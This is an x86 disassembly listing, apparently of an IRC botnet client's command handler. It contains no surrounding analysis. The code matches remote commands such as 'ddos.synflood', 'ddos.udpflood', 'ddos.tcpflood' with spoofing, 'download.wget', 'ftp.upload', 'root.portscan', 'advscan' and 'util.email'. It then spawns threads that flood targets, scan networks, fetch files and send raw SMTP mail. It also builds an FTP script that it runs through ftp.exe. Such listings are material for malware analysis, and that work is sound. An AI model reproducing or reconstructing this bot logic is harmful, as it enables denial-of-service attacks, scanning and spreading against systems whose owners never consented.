jz loc_410D4B
push [ebp+arg_8]
push offset dword_4240C0
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410C46
push [ebp+arg_8]
push (offset loc_4240B3+1)
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410C46
push [ebp+arg_8]
push (offset loc_4240A7+1)
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410C46
push [ebp+arg_8]
push offset aDdos_synflood ; "ddos.synflood"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410B48
push [ebp+arg_8]
push offset aDdos_synf ; "ddos.synf"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410B48
push [ebp+arg_8]
push offset aDownload_wget ; "download.wget"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410A07
push [ebp+arg_8]
push offset aDownload_wg ; "download.wg"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410A07
push [ebp+arg_8]
push offset aDaemon_redirec ; "daemon.redirect"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41090A
push [ebp+arg_8]
push offset aDaemon_rd ; "daemon.rd"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41090A
push [ebp+arg_8]
push offset aRoot_portscan ; "root.portscan"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410817
push [ebp+arg_8]
push offset aRoot_ps ; "root.ps"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410817
push [ebp+arg_8]
push offset aClone_privmsg ; "clone.privmsg"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410742
push [ebp+arg_8]
push offset aClone_pm ; "clone.pm"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410742
push [ebp+arg_8]
push offset aClone_action ; "clone.action"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41062A
push [ebp+arg_8]
push offset aClone_ac ; "clone.ac"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41062A
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz loc_40D6A7
push [ebp+arg_8]
push offset aAdvscan ; "advscan"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4102D3
push [ebp+arg_8]
push offset aAsc ; "asc"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4102D3
push [ebp+arg_8]
push offset aDdos_udpflood ; "ddos.udpflood"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4101B0
push [ebp+arg_8]
push offset aDdos_udpf ; "ddos.udpf"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4101B0
push [ebp+arg_8]
push offset aU_0 ; "u"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4101B0
push [ebp+arg_8]
push offset aDdos_pingflood ; "ddos.pingflood"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41006C
push [ebp+arg_8]
push offset aDdos_pingf ; "ddos.pingf"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41006C
push [ebp+arg_8]
push offset aP ; "p"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41006C
push [ebp+arg_8]
push offset aDdos_tcpflood ; "ddos.tcpflood"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_40FED3
push [ebp+arg_8]
push offset aDdos_tcpf ; "ddos.tcpf"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_40FED3
push [ebp+arg_8]
push offset aUtil_email ; "util.email"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40FD0A
lea eax, [ebp+var_3F8]
push edi
push eax
call sub_415B90
push [ebp+arg_18]
call sub_4159EF
push [ebp+arg_0]
mov [ebp+arg_18], eax
lea eax, [ebp+var_DB0]
push eax
call sub_415B90
push [ebp+arg_10]
lea eax, [ebp+var_BA8]
push eax
call sub_415B90
push offset asc_425D24 ; " "
push offset a__0 ; "_"
push [ebp+esi+var_80]
call sub_408E1D
push eax
lea eax, [ebp+var_55C]
push eax
call sub_415B90
add esp, 30h
lea eax, [ebp+var_6EC]
push eax
push 101h
call ds:dword_4363E0 ; WSAStartup
lea eax, [ebp+var_3F8]
push eax
call ds:dword_4364EC ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call ds:dword_4364E8 ; socket
push [ebp+arg_18]
mov esi, eax
mov [ebp+var_2EC], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_2E8], eax
call ds:dword_436468 ; htons
mov [ebp+var_2EA], ax
lea eax, [ebp+var_55C]
push eax
lea eax, [ebp+var_DB0]
push eax
lea eax, [ebp+var_55C]
push eax
lea eax, [ebp+var_BA8]
push eax
lea eax, [ebp+var_DB0]
push eax
lea eax, [ebp+var_15B0]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_415480
add esp, 1Ch
lea eax, [ebp+var_2EC]
push 10h
push eax
push esi
call ds:dword_436410 ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_CAC]
push edi
push eax
push esi
call ds:dword_436480 ; recv
lea eax, [ebp+var_CAC]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_15B0]
push eax
push esi
call ds:dword_4364B8 ; send
push ebx
lea eax, [ebp+var_CAC]
push edi
push eax
push esi
call ds:dword_436480 ; recv
push esi
call ds:dword_436500 ; closesocket
call ds:dword_4363C8 ; WSACleanup
lea eax, [ebp+var_BA8]
push eax
push offset unk_42D190
loc_40FCF6: ; CODE XREF: sub_40D2E0+3B51�j
; sub_40D2E0+3E38�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
add esp, 0Ch
jmp loc_411ED0
; ---------------------------------------------------------------------------
loc_40FD0A: ; CODE XREF: sub_40D2E0+28C0�j
push [ebp+arg_8]
push offset aUtil_httpcon ; "util.httpcon"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_40FEA2
push [ebp+arg_8]
push offset aUtil_hcon ; "util.hcon"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_40FEA2
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz loc_40D6A7
push [ebp+arg_8]
push offset aFtp_upload ; "ftp.upload"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_4133B5
push 4
push esi
call sub_40B614
pop ecx
test eax, eax
pop ecx
jnz short loc_40FD74
push esi
push offset dword_42D138
jmp loc_41206B
; ---------------------------------------------------------------------------
loc_40FD74: ; CODE XREF: sub_40D2E0+2A87�j
call ds:dword_422048 ; GetTickCount
push eax
call sub_4154D2
pop ecx
call sub_4154DC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4154DC
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_4154DC
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_CB0]
push edx
push eax
lea eax, [ebp+var_BAC]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_415480
lea eax, [ebp+var_BAC]
push offset aAb ; "ab"
push eax
call sub_415B78
add esp, 20h
cmp eax, ebx
mov [ebp+arg_24], eax
jz loc_40D6A7
push esi
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_415B26
push [ebp+arg_24]
call sub_415AD0
add esp, 20h
lea eax, [ebp+var_BAC]
push eax
lea eax, [ebp+var_3F8]
push offset aSS_4 ; "-s:%s"
push eax
call sub_415480
add esp, 0Ch
lea eax, [ebp+var_3F8]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call ds:dword_4363DC
test eax, eax
push edi
push esi
jz short loc_40FE41
push offset dword_42D0C0
jmp short loc_40FE46
; ---------------------------------------------------------------------------
loc_40FE41: ; CODE XREF: sub_40D2E0+2B58�j
push offset dword_42D084
loc_40FE46: ; CODE XREF: sub_40D2E0+2B5F�j
call sub_415480
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40FE6F
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
loc_40FE6F: ; CODE XREF: sub_40D2E0+2B71�j
lea eax, [ebp+var_2DC]
push eax
call sub_40A5B3
loc_40FE7B: ; CODE XREF: sub_40D2E0+2BC0�j
lea eax, [ebp+var_BAC]
push 4
push eax
call sub_40B614
add esp, 0Ch
test eax, eax
jz loc_40D6A7
lea eax, [ebp+var_BAC]
push eax
call sub_417CDA
jmp short loc_40FE7B
; ---------------------------------------------------------------------------
loc_40FEA2: ; CODE XREF: sub_40D2E0+2A3B�j
; sub_40D2E0+2A52�j
push [ebp+esi+var_80]
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
call sub_4159EF
pop ecx
push eax
push edi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40513E
loc_40FECB: ; CODE XREF: sub_40D2E0+587A�j
add esp, 24h
jmp loc_4133B5
; ---------------------------------------------------------------------------
loc_40FED3: ; CODE XREF: sub_40D2E0+2892�j
; sub_40D2E0+28A9�j
mov esi, 80h
push edi
lea eax, [ebp+var_678]
push esi
push eax
call sub_4159FA
lea eax, [ebp+var_678]
push eax
push offset aSyn ; "syn"
call sub_4158A0
add esp, 14h
test eax, eax
jz short loc_40FF36
lea eax, [ebp+var_678]
push eax
push offset aAck ; "ack"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40FF36
lea eax, [ebp+var_678]
push eax
push offset aRandom ; "random"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40FF36
push offset dword_42D04C
jmp loc_412A6C
; ---------------------------------------------------------------------------
loc_40FF36: ; CODE XREF: sub_40D2E0+2C1C�j
; sub_40D2E0+2C33�j ...
push [ebp+arg_10]
call sub_4159EF
cmp eax, ebx
pop ecx
mov [ebp+var_570], eax
jle loc_410062
push edi
lea eax, [ebp+var_678]
push esi
push eax
call sub_4159FA
add esp, 0Ch
lea eax, [ebp+var_6F8]
push [ebp+arg_18]
push esi
push eax
call sub_4159FA
push [ebp+arg_0]
call sub_4159EF
mov [ebp+var_574], eax
add esp, 10h
xor eax, eax
cmp [ebp+var_9B6], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_6FC], eax
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_4159FA
mov eax, [ebp+var_4]
add esp, 0Ch
cmp [ebp+var_56C], ebx
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40FFD3
mov eax, offset aNormal ; "Normal"
loc_40FFD3: ; CODE XREF: sub_40D2E0+2CEC�j
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push eax
push offset dword_42CFF8
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_4159FA
push ebx
lea eax, [ebp+var_2DC]
push 0Ch
push eax
call sub_414F2C
add esp, 2Ch
mov [ebp+var_578], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6FC]
push ebx
push eax
push offset sub_401D82
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_578]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_410051
loc_41003B: ; CODE XREF: sub_40D2E0+2D6F�j
cmp [ebp+var_560], ebx
jnz loc_412A7A
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_41003B
; ---------------------------------------------------------------------------
loc_410051: ; CODE XREF: sub_40D2E0+2D59�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42CFB0
jmp loc_41206B
; ---------------------------------------------------------------------------
loc_410062: ; CODE XREF: sub_40D2E0+2C67�j
push offset dword_42CF68
jmp loc_412A6C
; ---------------------------------------------------------------------------
loc_41006C: ; CODE XREF: sub_40D2E0+284D�j
; sub_40D2E0+2864�j ...
cmp ds:dword_436558, ebx
mov esi, [ebp+arg_4]
jnz loc_410177
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_300], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_398]
push edi
push eax
call sub_416D30
push [ebp+arg_18]
call sub_4159EF
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_4159EF
push [ebp+arg_10]
mov [ebp+var_314], eax
call sub_4159EF
push 7Fh
mov [ebp+var_310], eax
push [ebp+var_8C]
lea eax, [ebp+var_418]
push eax
call sub_416D30
add esp, 24h
lea eax, [ebp+var_398]
mov [ebp+var_41C], esi
push [ebp+var_310]
push [ebp+var_314]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_318]
push offset unk_42CF10
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 0Eh
push eax
call sub_414F2C
add esp, 24h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_41C]
push ebx
push eax
push offset sub_4095CC
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_410166
loc_410154: ; CODE XREF: sub_40D2E0+2E84�j
cmp [ebp+var_2FC], ebx
jnz short loc_410190
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_410154
; ---------------------------------------------------------------------------
loc_410166: ; CODE XREF: sub_40D2E0+2E72�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42CEC8
jmp loc_410D3A
; ---------------------------------------------------------------------------
loc_410177: ; CODE XREF: sub_40D2E0+2D95�j
push 1FFh
lea eax, [ebp+var_2DC]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_416D30
loc_41018D: ; CODE XREF: sub_40D2E0+3A66�j
add esp, 0Ch
loc_410190: ; CODE XREF: sub_40D2E0+2E7A�j
; sub_40D2E0+2FD2�j ...
cmp [ebp+var_8], ebx
jnz loc_41327F
push ebx
push [ebp+var_4]
loc_41019D: ; CODE XREF: sub_40D2E0+567E�j
lea eax, [ebp+var_2DC]
push eax
push [ebp+var_8C]
push esi
jmp loc_412A97
; ---------------------------------------------------------------------------
loc_4101B0: ; CODE XREF: sub_40D2E0+2808�j
; sub_40D2E0+281F�j ...
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_300], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_398]
push edi
push eax
call sub_416D30
push [ebp+arg_18]
call sub_4159EF
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_4159EF
push [ebp+arg_10]
mov [ebp+var_314], eax
call sub_4159EF
mov esi, [ebp+esi+var_80]
add esp, 18h
cmp esi, ebx
mov [ebp+var_310], eax
jz short loc_410215
push esi
call sub_4159EF
pop ecx
mov [ebp+var_30C], eax
jmp short loc_41021B
; ---------------------------------------------------------------------------
loc_410215: ; CODE XREF: sub_40D2E0+2F24�j
mov [ebp+var_30C], ebx
loc_41021B: ; CODE XREF: sub_40D2E0+2F33�j
push 7Fh
lea eax, [ebp+var_418]
push [ebp+var_8C]
push eax
call sub_416D30
add esp, 0Ch
mov esi, [ebp+arg_4]
lea eax, [ebp+var_398]
mov [ebp+var_41C], esi
push [ebp+var_310]
push [ebp+var_314]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_318]
push offset dword_42CE58
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 0Fh
push eax
call sub_414F2C
add esp, 24h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_41C]
push ebx
push eax
push offset sub_409758
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_4102C2
loc_4102AC: ; CODE XREF: sub_40D2E0+2FE0�j
cmp [ebp+var_2FC], ebx
jnz loc_410190
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_4102AC
; ---------------------------------------------------------------------------
loc_4102C2: ; CODE XREF: sub_40D2E0+2FCA�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42CE10
jmp loc_410D3A
; ---------------------------------------------------------------------------
loc_4102D3: ; CODE XREF: sub_40D2E0+27DA�j
; sub_40D2E0+27F1�j
push 8
call sub_415174
push [ebp+arg_18]
mov [ebp+arg_8], eax
call sub_4159EF
add eax, [ebp+arg_8]
pop ecx
pop ecx
cmp eax, 3E8h
jle short loc_410326
push [ebp+arg_8]
lea eax, [ebp+var_2DC]
push offset unk_42CDC4
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 20h
jmp loc_4133B5
; ---------------------------------------------------------------------------
loc_410326: ; CODE XREF: sub_40D2E0+300F�j
push edi
call sub_4159EF
push [ebp+arg_18]
mov [ebp+var_330], eax
call sub_4159EF
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_4159EF
add esp, 0Ch
cmp eax, 2
mov [ebp+var_32C], eax
jnb short loc_41035F
push 2
pop eax
mov [ebp+var_32C], eax
loc_41035F: ; CODE XREF: sub_40D2E0+3074�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_41036C
mov [ebp+var_32C], ecx
loc_41036C: ; CODE XREF: sub_40D2E0+3084�j
push [ebp+arg_10]
call sub_4159EF
cmp eax, 270Fh
pop ecx
mov [ebp+var_328], eax
jbe short loc_41038C
mov [ebp+var_328], 270Fh
loc_41038C: ; CODE XREF: sub_40D2E0+30A0�j
or [ebp+var_314], 0FFFFFFFFh
cmp ds:dword_426620, ebx
mov [ebp+arg_0], ebx
jz short loc_4103E2
mov [ebp+arg_24], offset dword_426620
loc_4103A5: ; CODE XREF: sub_40D2E0+30E4�j
mov eax, [ebp+arg_24]
push edi
add eax, 0FFFFFFD8h
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_4103C8
add [ebp+arg_24], 3Ch
inc [ebp+arg_0]
mov eax, [ebp+arg_24]
cmp [eax], ebx
jnz short loc_4103A5
jmp short loc_4103E2
; ---------------------------------------------------------------------------
loc_4103C8: ; CODE XREF: sub_40D2E0+30D6�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_314], eax
imul ecx, 3Ch
mov ecx, ds:dword_426620[ecx]
mov [ebp+var_330], ecx
loc_4103E2: ; CODE XREF: sub_40D2E0+30BC�j
; sub_40D2E0+30E6�j
cmp [ebp+var_330], ebx
jz loc_4124A7
mov edi, [ebp+esi+var_80]
cmp edi, ebx
mov [ebp+arg_18], edi
jz short loc_410429
cmp byte ptr [edi], 23h
jz short loc_410429
push edi
lea eax, [ebp+var_444]
push 10h
push eax
call sub_4159FA
push 78h
push edi
call sub_417070
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_304], eax
jmp loc_4104FD
; ---------------------------------------------------------------------------
loc_410429: ; CODE XREF: sub_40D2E0+3117�j
; sub_40D2E0+311C�j
cmp [ebp+var_9C7], bl
jnz short loc_41044B
cmp [ebp+var_9C6], bl
jnz short loc_41044B
cmp [ebp+var_9B6], bl
jnz short loc_41044B
push offset unk_42CD80
jmp loc_412A6C
; ---------------------------------------------------------------------------
loc_41044B: ; CODE XREF: sub_40D2E0+314F�j
; sub_40D2E0+3157�j ...
push 10h
lea eax, [ebp+arg_0]
pop edi
push eax
lea eax, [ebp+var_2EC]
push eax
mov [ebp+arg_0], edi
push [ebp+arg_4]
call ds:dword_43640C ; getsockname
mov al, [ebp+var_9C7]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2E8], eax
push [ebp+var_2E8]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_444]
push eax
call sub_416D30
add esp, 0Ch
cmp [ebp+var_9B6], bl
jz short loc_4104F7
xor eax, eax
cmp [ebp+var_9C7], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_444]
push eax
call sub_417030
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_4104EB
loc_4104C9: ; CODE XREF: sub_40D2E0+3209�j
cmp eax, ebx
jz short loc_4104EB
mov byte ptr [eax], 78h
lea eax, [ebp+var_444]
push 30h
push eax
call sub_417030
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_4104C9
loc_4104EB: ; CODE XREF: sub_40D2E0+31E7�j
; sub_40D2E0+31EB�j
mov [ebp+var_304], 1
jmp short loc_4104FD
; ---------------------------------------------------------------------------
loc_4104F7: ; CODE XREF: sub_40D2E0+31C1�j
mov [ebp+var_304], ebx
loc_4104FD: ; CODE XREF: sub_40D2E0+3144�j
; sub_40D2E0+3215�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov [ebp+var_334], eax
mov eax, [ebp+var_4]
mov [ebp+var_30C], eax
mov eax, [ebp+var_8]
mov [ebp+var_308], eax
mov edi, 80h
lea eax, [ebp+var_434]
push edi
push eax
call sub_4159FA
mov esi, [ebp+esi+var_7C]
add esp, 0Ch
cmp esi, ebx
jz short loc_41054E
loc_41053B: ; CODE XREF: sub_40D2E0+3291�j
push esi
loc_41053C: ; CODE XREF: sub_40D2E0+327B�j
lea eax, [ebp+var_3B4]
push edi
push eax
call sub_4159FA
add esp, 0Ch
jmp short loc_410579
; ---------------------------------------------------------------------------
loc_41054E: ; CODE XREF: sub_40D2E0+3259�j
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_41055D
cmp byte ptr [eax], 23h
jnz short loc_41055D
push eax
jmp short loc_41053C
; ---------------------------------------------------------------------------
loc_41055D: ; CODE XREF: sub_40D2E0+3273�j
; sub_40D2E0+3278�j
mov esi, offset aF_0 ; "#f"
push offset byte_4325D8
push esi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_41053B
mov [ebp+var_3B4], bl
loc_410579: ; CODE XREF: sub_40D2E0+326C�j
cmp [ebp+var_304], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_41058B
mov eax, offset aSequential ; "Sequential"
loc_41058B: ; CODE XREF: sub_40D2E0+32A4�j
push [ebp+var_318]
lea ecx, [ebp+var_444]
push [ebp+var_328]
push [ebp+var_32C]
push [ebp+var_330]
push ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_42CCFC
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_414F2C
add esp, 2Ch
mov [ebp+var_324], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_444]
push ebx
push eax
push offset sub_405FC5
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_324]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_410619
loc_410603: ; CODE XREF: sub_40D2E0+3337�j
cmp [ebp+var_300], ebx
jnz loc_412A7A
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_410603
; ---------------------------------------------------------------------------
loc_410619: ; CODE XREF: sub_40D2E0+3321�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42CCB4
jmp loc_41206B
; ---------------------------------------------------------------------------
loc_41062A: ; CODE XREF: sub_40D2E0+279A�j
; sub_40D2E0+27B1�j
push edi
call sub_4159EF
imul eax, 234h
pop ecx
cmp ds:byte_43BED8[eax], bl
jz loc_4133B5
cmp [ebp+var_C], ebx
jz loc_4133B5
push [ebp+arg_18]
call sub_415C80
push edi
mov esi, eax
call sub_415C80
push [ebp+arg_8]
add esi, eax
call sub_415C80
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_415A50
add esp, 14h
mov esi, eax
lea eax, [ebp+var_2DC]
push esi
push offset dword_42CCA8
push eax
call sub_415480
add esp, 0Ch
cmp esi, ebx
jz loc_4133B5
push edi
call sub_4159EF
test eax, eax
pop ecx
jle loc_4133B5
push edi
call sub_4159EF
cmp eax, 400h
pop ecx
jge loc_4133B5
push ebx
lea eax, [ebp+var_2DC]
push ebx
push eax
push [ebp+arg_18]
push edi
call sub_4159EF
imul eax, 234h
pop ecx
push ds:dword_43BECC[eax]
call sub_40BAE7
push edi
call sub_4159EF
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_43BCC0[eax], 73h
jnz loc_4133B5
push esi
push edi
call sub_4159EF
imul eax, 234h
pop ecx
add eax, offset byte_43BED8
push eax
push [ebp+arg_18]
push offset aSSS_1 ; "[%s] * %s %s"
loc_410715: ; CODE XREF: sub_40D2E0+3532�j
lea eax, [ebp+var_2DC]
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 28h
jmp loc_4133B5
; ---------------------------------------------------------------------------
loc_410742: ; CODE XREF: sub_40D2E0+276C�j
; sub_40D2E0+2783�j
push edi
call sub_4159EF
imul eax, 234h
pop ecx
cmp ds:byte_43BED8[eax], bl
jz loc_4133B5
cmp [ebp+var_C], ebx
jz loc_4133B5
push [ebp+arg_18]
call sub_415C80
push edi
mov esi, eax
call sub_415C80
push [ebp+arg_8]
add esi, eax
call sub_415C80
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_415A50
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_4133B5
push edi
call sub_4159EF
test eax, eax
pop ecx
jle loc_4133B5
push edi
call sub_4159EF
cmp eax, 400h
pop ecx
jge loc_4133B5
push ebx
push ebx
push esi
push [ebp+arg_18]
push edi
call sub_4159EF
imul eax, 234h
pop ecx
push ds:dword_43BECC[eax]
call sub_40BAE7
push edi
call sub_4159EF
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_43BCC0[eax], 73h
jnz loc_4133B5
push esi
push edi
call sub_4159EF
imul eax, 234h
pop ecx
add eax, offset byte_43BED8
push eax
push [ebp+arg_18]
push offset aSSS_0 ; "[%s] <%s> %s"
jmp loc_410715
; ---------------------------------------------------------------------------
loc_410817: ; CODE XREF: sub_40D2E0+273E�j
; sub_40D2E0+2755�j
push edi
call ds:dword_4364A8 ; inet_addr
push [ebp+arg_18]
mov [ebp+var_474], eax
call sub_4159EF
push [ebp+arg_0]
mov [ebp+var_480], eax
call sub_4159EF
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_47C], eax
lea eax, [ebp+var_500]
mov [ebp+var_504], esi
push eax
call sub_416D30
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_46C], edi
push [ebp+var_47C]
mov [ebp+var_468], eax
push [ebp+var_480]
push [ebp+var_474]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_2DC]
push offset unk_42CC3C
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_414F2C
add esp, 20h
mov [ebp+var_478], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_504]
push ebx
push eax
push offset sub_4142A5
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_478]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_4108F9
loc_4108E3: ; CODE XREF: sub_40D2E0+3617�j
cmp [ebp+var_464], ebx
jnz loc_412953
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_4108E3
; ---------------------------------------------------------------------------
loc_4108F9: ; CODE XREF: sub_40D2E0+3601�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42CBF0
jmp loc_412944
; ---------------------------------------------------------------------------
loc_41090A: ; CODE XREF: sub_40D2E0+2710�j
; sub_40D2E0+2727�j
push edi
call sub_4159EF
push 7Fh
mov [ebp+var_314], eax
push [ebp+arg_18]
lea eax, [ebp+var_418]
push eax
call sub_416D30
push [ebp+arg_0]
call sub_4159EF
mov esi, [ebp+arg_4]
add esp, 14h
mov [ebp+var_318], eax
lea eax, [ebp+var_398]
push [ebp+var_8C]
mov [ebp+var_420], esi
push 80h
push eax
call sub_4159FA
mov eax, [ebp+var_8]
add esp, 0Ch
mov edi, [ebp+var_4]
mov [ebp+var_304], eax
push [ebp+var_318]
lea eax, [ebp+var_418]
mov [ebp+var_308], edi
push eax
push [ebp+var_314]
push esi
call sub_409526
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_42CBA4
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 10h
push eax
call sub_414F2C
add esp, 24h
mov [ebp+var_310], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_420]
push ebx
push eax
push offset sub_406224
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_310]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_4109F6
loc_4109E0: ; CODE XREF: sub_40D2E0+3714�j
cmp [ebp+var_300], ebx
jnz loc_412953
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_4109E0
; ---------------------------------------------------------------------------
loc_4109F6: ; CODE XREF: sub_40D2E0+36FE�j
call ds:dword_42206C ; RtlGetLastWin32Error
